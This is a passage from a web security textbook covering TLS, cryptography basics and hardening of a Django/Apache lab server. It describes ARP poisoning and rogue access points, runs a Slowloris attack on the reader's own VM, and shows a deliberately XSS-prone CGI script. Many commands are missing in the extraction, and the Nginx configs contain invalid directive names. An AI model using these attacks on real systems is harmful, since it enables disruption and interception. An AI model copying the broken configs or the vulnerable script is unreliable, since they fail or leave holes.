Before we can encrypt the file, we must create a public-private key pair. We
will use the openssl command. Enter the following:
This will create a 2048-bit private key and save it to private.pem. If you
look at the file, you will see it is encoded as ASCII text:
> cat private.pem
Next, extract the public key from the private key with
The file cipher.dat is binary, but you can view it with the hexdump
command:
> hexdump cipher.dat
73
Chapter 4 Transport and Encryption
Hashing
Related to encryption is hashing. Hashing also makes data unreadable.
Unlike encryption, there is no way to reverse the process: hashing is a one-
way function.
Hashing is useful for storing passwords. When a user registers at a
website and they enter a password, that password is stored server side in
hashed form, or it should be. When the user types the password to log in, it
is hashed again and compared with the stored hash. The advantage of this
approach is that if the password file is compromised, users’ passwords are
not disclosed (we will return to this topic in Chapter 9).
Hashes do not have to be the same length as the plaintext. Hashes
are often used to create a digest or checksum of plaintext, which is used
to confirm integrity. To do this, the owner of data creates a hash. The
recipient also creates a hash and checks it matches the owner’s (of course,
the recipient must trust the authenticity of the owner’s hash).
As hashes are shorter than the plaintext, they are not necessarily unique.
If two sets of data result in the same hash, it causes a collision. In practice,
this rarely causes problems. A good hashing algorithm has high entropy: a lot
of information is coded in a small number of characters (human languages
have a much lower entropy). Hashing algorithms are also designed so that
even a small change to the plaintext will result in a different hash.
74
Chapter 4 Transport and Encryption
Base64 Encoding
As we saw in the previous exercise, encryption and hashing algorithms
produce binary data, even if the plaintext is ASCII. This is problematic if
a protocol requires an ASCII representation. One solution is to represent
the bytes as hexadecimal characters. Each byte therefore takes two bytes
to encode, as two hexadecimal characters are needed to represent an
8-bit number.
Base64 is a more efficient encoding algorithm that converts binary
data to text by encoding every three 8-bit bytes as four 6-bit bytes. If the
plaintext length is not a multiple of three, it is padded. Thus, a Base64-
encoded string is a third longer (or a little more if padded) than the original
binary data.
Base64 is often used in preference over hexadecimal notation as fewer
bytes are required. The key files we created in the previous exercise were
encoded using Base64.
We will create a SHA-256 checksum of some sample data. First, SSH to your
Coffeeshop VM with
vagrant ssh
As in the previous example, we will create a text file called plain.txt. At the
Bash prompt inside the Coffeeshop VM, create a file with your favorite Linux
editor, for example:
nano plain.txt
75
Chapter 4 Transport and Encryption
Now is the time for all good men to come to the aid of
the party.
SHA256(data.txt)=
d9a9849f2db7b54a8a1b4c0c593830437d95df5c6261ed4cd2afcf65ff25a63a
The length will be the same regardless of the number of characters in data.
txt. This is the SHA-256 hash represented as hexadecimal digits.
The SHA hash is the second part of the line after the space. Copy this into the
clipboard and paste it into a file. We will call this file sha.txt. Let’s convert
it to Base64. To do this, we must first convert the hexadecimal digits back to
binary, for which we can use the xxd command. Enter the following:
You should see the Base64 representation of your SHA hash, in our example
Ac2THEX48N5Yutf+QJ41i1Yi7h38tMZIv3euXVlu2so=
Digital Signatures
Digital signatures differ from both encryption and hashing. They enable
a recipient of data to verify its integrity. The sender encrypts data using
their private key, not the recipient’s public key. This forms a signature that
is sent along with the plaintext. The recipient decrypts the signature using
76
Chapter 4 Transport and Encryption
the sender’s public key and checks the plaintext matches the version in
the signature. For secrecy, the plaintext or the entire message can also be
encrypted with the recipient’s public key.
This results in a signature that grows with plaintext size. To obtain
a short, fixed-length signature, a hashing algorithm such as SHA is
first applied to the plaintext, and the hash is signed rather than the full
plaintext data.
The process is illustrated in Figure 4-3. The process works because
if the decrypted data matches the original data, only the sender could
have signed it (or someone else who has the sender’s private key). If the
plaintext data changed, it will not match the version contained in the
signature.
The advantages of digital signatures over hashes are as follows:
• The public key only has to be sent once, not for each
message as a checksum would. It can be sent on a side
channel.
77
Chapter 4 Transport and Encryption
78
Chapter 4 Transport and Encryption
We will sign some text using RSA and then verify the signature matches the
original data. Begin by entering the Coffeeshop VM by running the following
command within the Coffeeshop’s vagrant directory:
vagrant ssh
Create a text file called plain.txt using your favorite Linux editor, for
example:
nano plain.txt
Enter some text and save the file. Once again, we have entered
Now is the time for all good men to come to the aid of
the party.
We can now sign plain.txt. The openssl dgst command can create a
SHA-256 hash and sign it in one step. Enter the following:
The file sig.dat is binary, but you can view it with the hexdump command:
> hexdump sig.dat
0000000 9f3b 3777 21f0 23c3 fad0 64d3 9e7a 17aa
0000010 efe3 debe e084 47df 99f4 222c f7e7 d2a1
...
00000f0 5b96 c52f 5212 6e75 aca8 a1c4 3c56 0afe 0000100
79
Chapter 4 Transport and Encryption
If the plain text inside sig.txt matches the hash of the text in plain.txt,
you should see the response
Verified OK
Key Exchange
Public-key encryption is very useful because only public keys need to be
transmitted, keeping the private keys secret. However, symmetric-key
algorithms are much faster. For this reason, public-key encryption such
as RSA is often used to securely negotiate a symmetric key. After the
exchange, symmetric-key encryption is used to exchange data.
Diffie-Hellman Key Exchange (DH) [8] is an algorithm for exchanging
keys using a public-private key pair. Its unique feature is that the
symmetric key is never transmitted and is a product of both parties’ public
and private keys.
To see how DH works, say Bob and Alice wish to communicate with
each other using a symmetric key. First, Bob and Alice agree on two
numbers: a number q and a number α, which is coprime with q − 1. These
can be shared—they are not secret.
80
Chapter 4 Transport and Encryption
Ya = X aα mod q
Yb = X bα mod q
Alice and Bob exchange Ya and Yb, which are their public keys. The
values Xa and Xb are their private keys. Next, Alice uses Bob’s public key
and her private key to calculate
S a = Yb X a mod q
and Bob uses Alice’s public key and his private key to calculate
Sb = Ya X b mod q
Sb = Sa.
81
Chapter 4 Transport and Encryption
4.3 Authentication and Certificates
Proving Authenticity
Public-key encryption provides secrecy but not authenticity. If Alice can
decrypt Bob’s message with her private key, she is confident the message is
secret and readable only by her. However, as her encryption key is public,
she does not know if Bob or someone else sent it.
This is illustrated in Figure 4-4. Here, Alice is attempting to access
a website, coffeeshop.com. Alice makes a request to coffeeshop.com,
which is intercepted by an evil hacker. The hacker makes the same request
to coffeeshop.com using their own key. The figure shows what happens
when coffeeshop.com sends the response. The evil hacker receives and
decrypts it and then reencrypts it with their own key before forwarding it
to Alice. Alice can decrypt the data but has no way of knowing whether it
came from coffeeshop.com or the hacker.
82
Chapter 4 Transport and Encryption
83
Chapter 4 Transport and Encryption
Once cert.com has satisfied itself that the requester of the signature
is the owner of coffeeshop.com, it will send back a certificate signed
with cert.com’s private key. It will include an expiry date, between three
months’ and one years’ time. coffeeshop.com can now send this certificate
to Alice’s web browser.
Alice’s web browser is preconfigured with cert.com’s public key. It
checks that the domain name in the signature matches the domain name
84
Chapter 4 Transport and Encryption
Alice made the request to. It also checks the certificate has not expired. If
these checks pass, Alice’s browser proceeds with the exchange. If not, it
warns Alice that the certificate is suspicious.
Let us examine what happens in a man-in-the-middle attack when
certificates are being sent. This is illustrated in Figure 4-6. Alice makes
a request to coffeeshop.com, which is intercepted by the evil hacker.
The hacker makes their own identical request to coffeeshop.com. They
decrypt the response and reencrypt it before sending it to Alice. However,
Alice will not accept it without a certificate. The hacker has a choice: send
coffeeshop.com’s certificate or send their own (for evilhacker.com—
cert.com will not issue them with anything else).
85
Chapter 4 Transport and Encryption
Types of Certificates
To obtain a TLS certificate, you must prove you own the domain the
certificate is for. For some certificates, you must also prove you own the
organization the domain belongs to.
There are three types of TLS certificate:
• Domain validated
• Organization validated
• Extended validation
86
Chapter 4 Transport and Encryption
Not all CAs issue all types of certificate. Let’s Encrypt is a popular, free,
open source CA. It is able to issue certificates automatically using either
an HTTP challenge, by writing a certain file to the public path on the web
server, or a DNS challenge, by putting a specific value in a DNS record. As a
result, it is only able to offer domain-validated certificates.
Browsers allow you to view certificates by clicking on the lock icon in
the address bar next to the domain name. As an illustration, the PayPal’s
extended validation certificate and Hak5’s domain-validated certificate are
shown in Figures 4-7 and 4-8, respectively. These are from Firefox.
88
Chapter 4 Transport and Encryption
You can also sign your own certificate. These are called self-signed
certificates. Browsers will not trust them by default as they are not signed
by one of the CAs known to them. The browser will warn the visitor that
the certificate is untrusted. People can add self-signed certificates to the
browser’s trusted list. These are not suitable for public-facing production
websites but are useful for development, testing, and internal websites
where the organization can add certificate authorities to browsers. We will
create a self-signed certificate in the next chapter.
4.4 HTTPS
TLS Version 1.2
We have seen that public-key encryption is useful for avoiding the need
to exchange a secret key. However, it is much slower than symmetric-
key encryption. HTTPS uses symmetric-key encryption for performance
reasons but uses public-key encryption to create the symmetric key and
authenticate the server. The protocol for this is Transport Layer Security or
TLS [7]. It was formerly known as Secure Sockets Layer or SSL.
TLS, as its name suggests, encrypts at the transport layer level. This
means once a socket connection is established, everything across that
socket is encrypted. This includes the HTTP methods (GET, POST, etc.), the
GET and POST parameters, HTTP headers, request and response bodies,
and so on. The hostname, IP addresses, and port are not encrypted as they
are needed to establish the connection.
A TLS connection is established by a TLS handshake: a multistep
process in which the client authenticates the server and together they
establish a symmetric key to encrypt the data that follow. The TLS version 1.2
handshake is illustrated in Figure 4-9. We will look at the latest version, 1.3,
further in the following.
89
Chapter 4 Transport and Encryption
The client first sends its list of supported cipher suites (from which the
server will choose) and a 28-byte random string called the client random.
This is used later to create the symmetric key.
90
Chapter 4 Transport and Encryption
The server responds with its chosen cipher suite, its TLS certificate, and
its own 28-byte server random, also used to generate the symmetric key. The
client looks the CA’s name up in its list of trusted authorities. If it is found, it
authenticates the certificate and, so long as it is valid, proceeds to the next step.
The client generates another 28-byte random string called the
premaster secret and sends this to the server, encrypted with the server’s
public key.
The server and client now have
Each can now generate the master secret. This will be the symmetric
session key for encrypting the request and response.
It should now be clear why the hacker in the man-in-the-middle attack
cannot simply forward the server’s certificate to Alice. If they did so, Alice
and the server would create the session key between them, and the hacker
would not be able to decrypt the data.
91
Chapter 4 Transport and Encryption
the client and server with each exchange. The original server key in the
certificate is used to authenticate the server but is not used to create
symmetric keys. This way, even if the attacker obtains the server’s private
key, they will be unable to decrypt previous data. This is called Perfect
Forward Secrecy.
DHE is slower than regular RSA as a new public-private key pair must
be created with each exchange. However, it does protect past data in the
event of a private key being disclosed.
4.5 Summary
In this chapter, we looked in some detail at the HTTP protocol plus its
encrypted variant, HTTPS. We also looked at symmetric- and public-key
encryption techniques. These are needed to understand how HTTPS
works but are fundamental to web application security in their own right.
They will come up in later chapters as well, for example, when we look at
encrypting passwords.
92
Chapter 4 Transport and Encryption
93
CHAPTER 5
Installing and
Configuring Services
Now that we have explored how HTTP and HTTPS work, we can look at
how to set up a web server and associated services in a secure way. We
will start by looking at service architecture design: how trust boundaries
impact on protocol choices. Web frameworks make it easier to write safe
code, and we will take a look at some common options.
We looked briefly at man-in-the-middle attacks in the last chapter.
In this one, we will look at these attacks in more detail as well as how to
defend against them. We will also look at denial-of-service attacks and
what developers can do to mitigate their impact.
In the last chapter, we looked at the theory of HTTPS. After looking
at man-in-the-middle attacks, we will set up HTTPS for our Coffeeshop
application, using Let’s Encrypt as our CA.
We will also look at other techniques for securing our services: reverse
proxies, SSH tunnels, host firewalls, and TCP Wrappers.
Finally, we will move on from web servers and look at database server
security and securing the filesystem.
96
Chapter 5 Installing and Configuring Services
The database is outside the VPC and crosses the trust boundary
between it and the rest of the corporate intranet. We therefore encrypt the
database connection.
Our developers and operators need shell access on each of the servers
in the VPC. They use SSH over an externally open network interface. As
this interface crosses a trust boundary, it is encrypted. We can reduce the
attack surface by limiting SSH to just one development server, with a host
firewall or TCP Wrappers (see Section 5.7).
97
Chapter 5 Installing and Configuring Services
98
Chapter 5 Installing and Configuring Services
• Managing sessions
• Database integration
99
Chapter 5 Installing and Configuring Services
The examples in this book are based on Python and the Django
framework.1 It is open source and has been around since 2003. We chose it
for this book because it comes with many tools built in. Also, many third-
party libraries integrate with it. This makes its ecosystem consistent and
tools inter-operate well. Code written with Django can be very small and
clear. This makes code easy to read, and easy-to-read code is easier to spot
vulnerabilities in. Furthermore, it is a good tool for learning and exploring
security techniques.
Let us consider a simple GET request. In Django, we can write a
function to print a page of HTML including GET parameters passed in
the URL:
def hello(request):
name = request.GET.get('name', 'Nobody')
town = request.GET.get('town', 'Nowhere')
context = {"name": name, "town": town}
return render(request, 'hello.html', context)
We put this in the views.py file and map it to a URL with the following
in urls.py:
<html>
<head><title>Hello</title></head>
Hello {{name}} from {{town}}!
</html>
The equivalent using CGI directly would be the following script placed
in the cgi-bin directory:
1
www.djangoproject.com
100
Chapter 5 Installing and Configuring Services
#!/usr/bin/env python3
import os
import sys
name = 'Nobody'
town = 'Nowhere'
if ('QUERY_STRING' in os.environ):
params = os.environ['QUERY_STRING'].split('&')
for param in params:
key, value = param.split('=')
if (key == 'name'):
name = value
elif (key == 'town'):
town = value
print('Content-Type: text/html')
print(")
print('<html>')
print('<head><title>Hello</title></head>')
print('<p>Hello ' + name + ' from ' + town + '!</p>')
print('</html>')
sys.exit(0)
Not only is the code longer and less clear, but we have not decoded the GET
parameters (e.g., converting %20 to space), and this will take yet more code.
Also, we have already introduced a vulnerability (cross-site scripting, more
on this in Chapter 7). And we have an uglier URL (/cgi-bin/hello.py rather
than /hello), which takes additional web server configuration to improve.
Another popular Python framework is Flask.2 Django is an opinionated
framework: it works best when used the way the developers intended. You
2
https://flask.palletsprojects.com
101
Chapter 5 Installing and Configuring Services
write code within the Django framework. Flask is less opinionated. You put
Flask within your application. Opinionated vs. unopinionated frameworks
is largely a matter of personal preference, but opinionated frameworks
tend to be easier to learn.
For PHP developers, the Laravel framework3 has similar goals to Django.
Like Django, it reduces the likelihood of vulnerabilities by providing libraries
for common web tasks like authentication, URL mapping, etc.
Java programmers have a number of frameworks at their disposal
including Spring Boot,4 Struts,5 and more. And for Ruby developers, there
is Ruby on Rails.6
5.3 Man-in-the-Middle Attacks
We mentioned man-in-the-middle (MitM) attacks briefly in Chapter 4.
These are situations where an attacker is able to place themselves on the
network in order to read and sometimes alter traffic between two parties.
We won’t go into MitM attacks in much detail as it goes beyond web
development. However, we will give one example to illustrate how easy it
can be for an attacker to spy on traffic if it is not encrypted.
Man-in-the-middle is a class of attack rather than one particular
technique. In each type of attack, the attacker must make changes so that
they receive packets instead of the legitimate recipient. The attacker then
forwards the packets to the correct destination, possibly altering them first.
One MitM attack is ARP poisoning, which we describe in the following.
Other attacks include DNS cache poisoning and switch table overflow.
3
https://laravel.com
4
https://spring.io
5
https://struts.apache.org
6
https://rubyonrails.org
102
Chapter 5 Installing and Configuring Services
ARP stands for Address Resolution Protocol. Devices address each other
by their MAC address. However, applications (and users) address them by
IP address or domain name (domain names being mapped to IP addresses
by DNS). ARP is the protocol that allows devices to determine the MAC
address for an IP address it wishes to communicate with.
103
Chapter 5 Installing and Configuring Services
When the HTTP response comes into the gateway from the Internet, it
is only addressed with an IP address. The gateway needs the MAC address,
so it broadcasts an ARP request, asking for 192.168.0.100 to respond with
its MAC address. Alice’s computer sends back its MAC address, and the
gateway can forward the response to Alice.
At this point, we should look at the difference between an Ethernet
switch and an Ethernet hub. A hub acts as a repeater. Any packet coming in
from one port is echoed on all the other ports. If Alice and an attacker were
on the same Ethernet hub, the attacker would not have to do any spoofing
to read Alice’s requests as they would reach them anyway. For this reason,
hubs are considered legacy devices and are now rarely used. An Ethernet
switch knows which MAC address is on which port and only sends packets
for that MAC address to that one port. This can either be configured into
the switch manually (these are known as managed switches) or it can be
configured dynamically (these are unmanaged switches). In the latter, the
switch acts as a hub until it knows which MAC address is on which port.
ARP requests, because they are broadcast, are always sent to all ports.
In ARP poisoning, an attacker also responds to the ARP request but
responds with enough packets that it floods out the legitimate response.
Consider Figure 5-4. The hacker is at address 192.168.0.101, on the same
switch as Alice. When Alice’s computer sends an ARP request for the
MAC address of 192.168.0.1, the hacker responds with their address,
192.168.0.101. If they send enough response packets, Alice will forward her
request to their MAC address. They will spy on it, alter it if they want, and
then forward it to the gateway.
When the response for 192.168.0.100 arrives at the gateway, and the
gateway makes an ARP request, the attacker again responds with their
MAC address. They receive the response and forward it to Alice.
This can be a surprisingly simple attack to construct. Reliable open
source software already exists. One example is Ettercap.7
7
www.ettercap-project.org
104
Chapter 5 Installing and Configuring Services
Figure 5-4. ARP poisoning MitM attack. The hacker spoofs both Alice
and the gateway
105
Chapter 5 Installing and Configuring Services
Attackers can also set up rogue access points. To see how these work,
imagine turning on the Wi-Fi Hotspot on your mobile device, removing
the password, and calling the network Starbucks. As many devices are
configured to automatically connect to a known Wi-Fi SSID, and many
devices have already connected to Starbucks in the past, someone’s phone
will likely connect to your Hotspot.
Now imagine you have your own rogue Wi-Fi access point running on
a laptop and it is configured to log all traffic. Again, open source software
exists, for example, Wifiphisher.8 Cheap hardware also exists such as
Hak5’s WiFi Pineapple. This is known as an Evil Twin attack.
Can a hacker get physical access to your wired network? An Ethernet
tap is a three-way Ethernet adapter than can be placed between a device
and the switch and can log traffic crossing it.
8
https://wifiphisher.org
106
Chapter 5 Installing and Configuring Services
9
https://github.com/codebutler/firesheep
107
Chapter 5 Installing and Configuring Services
5.4 Denial-of-Service Attacks
Denial of Service, or DoS, occurs when an attacker causes a service to
be unavailable for legitimate users. DoS attacks are often considered the
10
http://faceniff.ponury.net
108
Chapter 5 Installing and Configuring Services
109
Chapter 5 Installing and Configuring Services
Our default Apache setup for Coffeeshop is vulnerable to the Slowloris attack.
To see this, ensure the Coffeeshop and CSThirdparty VMs are running. From a
terminal window, run
cd django-coffeeshop/coffeeshop/vagrant
vagrant up
cd ../../csthirdparty/vagrant
vagrant up
vagrant ssh
https://github.com/gkbrk/slowloris
Note that your browser may cache the response, making it appear that the server
is responding. If you find this is the case, try loading the page with Curl instead.
110
Chapter 5 Installing and Configuring Services
vagrant ssh
Edit the file /etc/apache2/apache2.conf and add the following line (at
the end will do):
RequestReadTimeout header=5-20,minrate=20
This says to allow 5 seconds to receive the headers. If data are received,
increase the timeout by 1 second after each 20 received bytes, up to a limit of
20 seconds.
A similar timeout can be set for the body, but these values are sufficient to
protect against the aforementioned attack.
Rerun the slowloris command. This time you should find that your site
remains responsive.
111
Chapter 5 Installing and Configuring Services
QS_SrvMaxConnPerIP 50
Restart Apache, start slowloris, and confirm your site is still responsive. It
should be, even if you do not include the RequestReadTimeout line because
it limits the number of connections from a single IP address to 50.
112
Chapter 5 Installing and Configuring Services
5.5 Setting Up HTTPS
The usual procedure for enabling HTTPS on your site is as follows:
113
Chapter 5 Installing and Configuring Services
For example:
114
Chapter 5 Installing and Configuring Services
vagrant ssh
cd /secrets/ssl
First, create a private key. This will be used for encryption when users visit our
site with HTTPS. The public key from it will go inside the certificate. We use
the same command we used in the exercise "RSA Encryption” in Chapter 4.
This creates a 2048-bit RSA key in a file coffeeshop.key. You should consider
this file a secret. A good practice is to make it owned and readable only by root.
Apache will still be able to read it as it starts with elevated privileges.
11
See https://blog.sean-wright.com/self-host-acme-server/
115
Chapter 5 Installing and Configuring Services
This will create a CSR called coffeeshop.csr. This would ordinarily be sent
to the CA to sign. However, we will sign it ourselves, with the same private key.
Enter the following command:
116
Chapter 5 Installing and Configuring Services
The last parameter points to a so-called extension file that contains extra
parameters needed by Chrome that the OpenSSL command line does not
provide. We will look at this later. The file already exists in the /secrets/ssl
directory.
Now install the certificate and private key somewhere where Apache can find
them. The default is /etc/ssl. We use ln -s rather than cp. We will discuss
why later.
We need to enable HTTPS in Apache and tell it where to find the key and
certificate. Enable the SSH module with
sudo cp /vagrant/apache2/000-default-ssl.conf \
/etc/apache2/sites-enabled/000-default.conf
117
Chapter 5 Installing and Configuring Services
Our server is ready to serve Coffeeshop over HTTPS, but no browser will trust
our key by default. For example, try the following curl command from within
the Coffeeshop VM:
curl https://10.50.0.2/
Notice the error. Now turn off validating the certificate with the --insecure
or -k flag:
This time Curl ignores the fact that it doesn’t trust the CA and sends the
response anyway (still encrypted with HTTPS).
118
Chapter 5 Installing and Configuring Services
Let’s tell Firefox to trust our certificate. Open Firefox on your host computer
and visit https://10.50.0.2. A warning similar to Figure 5-5 will appear.
Click Advanced to pop up the bottom panel as shown and click Accept the Risk
and Continue. The Coffeeshop site should display.
For Chrome, we need to manually add the certificate. Click on the three
vertical dots at the top-right corner of the window to open the menu and click
Settings. From the panel on the left, click Privacy and security, then Security,
then scroll down to see Manage certificates. Click on this.
The window that appears differs between Windows, Mac, and Linux. It is
shown in Figure 5-6 for Windows and Mac. In Windows, click on the Trusted
Root Certificate Authorities tab as shown and click the Import... button. In
Linux, click on the Authorities tab and click the Import button. On Mac, just
click the + or pencil button.
119
Chapter 5 Installing and Configuring Services
121
Chapter 5 Installing and Configuring Services
Browser Requirements
for Self-Signed Certificates
Browsers implement varying levels of security regarding self-signed
certificates. Firefox allows the user to add an exception, allowing the site to
be visited. It still flags the site as unsafe but does use encryption.
Chrome, as we saw in the previous exercise, does not allow the user to
add an exception, and the certificate must be manually added. It also requires
a Subject Alternative Name (SAN) to be added to the certificate. This is a
way of specifying multiple domain names and/or IP addresses in the same
certificate. Even if we have only one IP address or domain name, Chrome still
requires a SAN record. We included the details in the v3.ext file as OpenSSL
does not support these parameters on the command line. If you look at the
file, you will see we added the SAN record for our site by IP address.
basicConstraints=CA:FALSE
keyUsage = digitalSignature, nonRepudiation, keyEncipherment,
dataEncipherment
subjectAltName = @alt_names
[alt_names]
IP.1 = 10.50.0.2
Permanent Redirects
In the last exercise, we configured Apache to serve our site over both HTTP
and HTTPS. We saw in Section 5.3 that this introduces an SSL stripping
vulnerability. The solution is to make a 301 Moved Permanently redirect of
all traffic from HTTP to HTTPS. This prevents the server from responding
over HTTP. This is better than a 302 Found response as the latter is not
122
Chapter 5 Installing and Configuring Services
https://hstspreload.org
and registering your domain. So that only the owner of a domain can do
this, you must also extend with HSTS header on your server's responses as
follows:
Strict-Transport-Security: max-age=large-number;
includeSubDomains; preload
Once your domain is in the registry, you can remove the preload
keyword from the header.
Listing 5-2 shows how to modify the site configuration file to perform
a permanent redirect for a site example.com. You will need to load the
mod_alias module with
123
Chapter 5 Installing and Configuring Services
<VirtualHost *:80>
ServerName example.com
ServerAlias www.example.com
Redirect permanent / https://example.com/
</VirtualHost>
<VirtualHost *:443>
ServerName example.com
ServerAlias www.example.com
SSLEngine on
...
The equivalent for Nginx is shown in Listing 5-3. Lines 3 and 10 are
for IPv6.
server {
listen 80 default_server;
listen [::]:80 default_server;
services_name example.com www.example.com;
return 301 https://$host$request_uri;
}
server {
listen 443 ssl http2 default_server;
listen [::]:443 ssl http2 default_server;
services_name example.com www.example.com;
...
}
124
Chapter 5 Installing and Configuring Services
• Load balancing
125
Chapter 5 Installing and Configuring Services
126
Chapter 5 Installing and Configuring Services
Figure 5-8. Reverse proxy tunnelling traffic to a REST API (left) and
an application server (right)
127
Chapter 5 Installing and Configuring Services
<VirtualHost *:80>
ServerName coffeeshop.com
ServerAlias www.coffeeshop.com
Redirect permanent / https://coffeeshop.com/
</VirtualHost>
<VirtualHost *:443>
ServerName coffeeshop.com
ServerAlias www.coffeeshop.com
ProxyPass / http://192.168.0.3/
ProxyPassReverse / http://192.168.0.3/
SSLEngine on
...
</VirtualHost>
server {
listen 443;
listen [::]:443 ssl http2 default_server;
services_name coffeeshop.com www.coffeeshop.com;
128
Chapter 5 Installing and Configuring Services
location /api {
proxy_set_header Host $host:$services_port;
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-For $proxy_add_x_
forwarded_for;
proxy_pass http://192.168.0.2:5000;
proxy_redirect http://192.168.0.2:5000/ /api
}
location / {
proxy_set_header Host $host:$services_port;
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-For $proxy_add_x_
forwarded_for;
proxy_pass http://192.168.0.3;
proxy_redirect http://192.168.0.3/ /
}
}
SSH Tunnels
HTTPS only provides encryption for HTTP. It cannot be used, for example,
to encrypt database connections.
Many other protocols, for example, the Postgres, do also offer
encryption. For protocols that do not, SSH tunnels can be used.
An SSH tunnel, otherwise known as SSH port forwarding, wraps an
arbitrary TCP/IP protocol in an encrypted SSH connection. There are
two types: local forwarding and remote forwarding. In both cases, an SSH
port is opened to listen to connections. Upon connection, a tunnel is
established and used to forward packets to the target port and host.
129
Chapter 5 Installing and Configuring Services
Figure 5-9 shows an example local port forwarding. The SSH server
daemon is running on host ssh.remote.net. The developer wants to
establish a secure connection to Postgres running on port 5432 of host
db.remote.net. They pick a host local to them that they can run an SSH
client on. This may be localhost. In our example, it is client.remote.net.
They pick a local port: in our example, 8080. They use the SSH client to
connect to the SSH daemon running on ssh.remote.net. When they
connect to port 8080 on client.remote.net, say, with the psql command,
the Postgres packets will be wrapped in SSH and sent to ssh.remote.net,
which will unwrap them and send them onto the database server,
db.remote.net, on port 5432.
130
Chapter 5 Installing and Configuring Services
131
Chapter 5 Installing and Configuring Services
Again, traffic between the SSH client host and the database host is not
encrypted. A common application is allowing outside access to a service
on a local host, for example, a desktop computer, which does not have a
public IP address.
We will create an SSH tunnel with local port forwarding so that the Postgres
server running on the Coffeeshop VM can be securely connected to from the
CSThirdparty VM.
132
Chapter 5 Installing and Configuring Services
Each VM has an account called dbuser. The password is disabled, so the only
way to connect to it is with Sudo.
vagrant ssh
Now, in both VMs, change to the dbuser user. Passwords are disabled, so we
will have to use Sudo. Do this with the following command in each VM:
sudo su - dbuser
ssh-keygen
cat ˜dbuser/.ssh/id_rsa.pub
mkdir -p ˜/.ssh
chmod 700 ˜/.ssh
133
Chapter 5 Installing and Configuring Services
nano ˜/.ssh/authorized_keys
substituting your favorite Linux editor for nano. Paste the copied public key
from the clipboard into this file, save it, and exit the editor.
We need to change the file permissions:
chmod 600 ˜/.ssh/authorized_keys
Test if SSH works by running the following from the CSThirdparty VM (still
as dbuser). You will have to confirm you want to add 10.50.0.2 to the list of
known hosts.
ssh 10.50.0.2
but the connection may have nonetheless been established. You can confirm
this with
Once the connection is established, you can use this to connect to Postgres on
the Coffeeshop VM (from the CSThirdparty VM) with
134
Chapter 5 Installing and Configuring Services
echo $DBOWNERPWD
When you have finished, find the process ID (PID) of the SSH tunnel with
ps x
kill PID
5.7 Server Configuration
Hiding Service Details
We looked at hiding hostnames and ports behind a reverse proxy in the
last section. This is good practice because it reduces your attack surface,
especially if the back-end hosts are behind a firewall.
Hackers learn about their target systems by performing
reconnaissance. One open source tool for this is nmap, which probes hosts
and their open ports. We will not discuss nmap in much detail, but one
135
Chapter 5 Installing and Configuring Services
If an attacker knows the name and version of a service you are running,
they can look up its known vulnerabilities. Vulnerability databases are
listed in Chapter 14.
You can reduce the information nmap, and similar tools can be
obtained by
136
Chapter 5 Installing and Configuring Services
Banners are text that a service displays when it is connected to. For
example, you can see that the web server is Apache, and which version it
is, by running the command
curl -I http://10.50.0.2
from inside one of your VMs. Look for the Server: line.
For Apache, the version number (but not the fact that it is Apache) can
be hidden in configuration. Edit the /etc/apache2/conf-enabled/security.
conf file and change
ServerTokens OS
to
ServerTokens Prod
and
ServerSignature On
to
ServerSignature Off
137
Chapter 5 Installing and Configuring Services
Host Firewalls
Firewalls protect ports for whole networks or subnets. A host firewall runs
on a host and protects just that host’s ports. Ubuntu comes with ufw, which
stands for uncomplicated firewall. ufw controls Netfilter, a kernel-level
framework for packet filtering. It is enabled with
138
Chapter 5 Installing and Configuring Services
You can also delete rules by line number. To see the line numbers, type
USING NMAP
We will use nmap to see what it reveals about our Coffeeshop VM, make some
changes with ufw, and then see how it affects nmap’s output.
Make sure both your VMs are running with vagrant up, and then connect to
the Coffeeshop VM with vagrant ssh from Coffeeshop’s vagrant directory.
In another window, connect to the CSThirdparty VM with vagrant ssh from
CSThirdparty’s vagrant directory.
You should see that ports 22, 25, 80, 443, 1080, and 5432 are open.
Now go to the Coffeeshop VM. We will allow SSH, HTTP, and HTTPS from
anywhere. We will disable everything else. Enter the following ufw commands:
139
Chapter 5 Installing and Configuring Services
Now return to the CSThirdparty VM and run nmap again. This time it should
only report ports 22, 80, and 443.
Before finishing the exercise, disable the Coffeeshop firewall again as we will
need these ports open in later exercises.
If you like, you can repeat the nmap command with OS and service
fingerprinting enabled:
TCP Wrappers
ufw is a kernel-level firewall. TCP Wrappers (named in the plural) provides
application-level filtering. Applications support TCP Wrappers by linking
against its library tcpwrap.a or tcpwrap.so. Configuration is in the files /
etc/hosts.allow and /etc/hosts.deny.
The /etc/hosts.allow and /etc/hosts.deny files consist of lines in
the form
140
Chapter 5 Installing and Configuring Services
sshd : 192.168.0.*
ALL : 170.20.10.10
ALL : ALL
141
Chapter 5 Installing and Configuring Services
Hiding Errors
When developing a web application, we need to see errors. Django and
other WAFs can display back-end errors and stack traces in the web page,
aiding the development process.
However, if left in production systems, error messages can give away
details that help attackers find vulnerabilities.
Figure 5-11 shows an example of Django’s default debugging output.
It is produced by the URL http://10.50.0.2/pagewitherror in your
VM. Visit this URL and scroll through the error message. Included in this
output is
142
Chapter 5 Installing and Configuring Services
DEBUG = False
ADMINS = [("Coffeeshop Admin", "[email protected]")]
LOGGING = {
"version": 1,
"disable_existing_loggers": False,
"handlers": {
"console": {
"class": "logging.StreamHandler",
},
},
"loggers": {
"django": {
"handlers": ["console"],
143
Chapter 5 Installing and Configuring Services
"level": "INFO"
},
},
}
For more details about the LOGGING variable, see the Django
documentation.12 We will look more at Django logging in Chapter 12.
12
https://docs.djangoproject.com/en/3.2/topics/logging/
144
Chapter 5 Installing and Configuring Services
Recall from Chapter 4 that a web server returns a 404 Not Found
response code when a requested URL is not found. The text in the body of
the response can be configured by your web server or WAF.
Similarly, an error executing back-end code returns a default 500
Server Error page.
Both of these can be overridden to give friendlier yet vaguer errors
about what went wrong. In Django, we do this by adding handlers in the
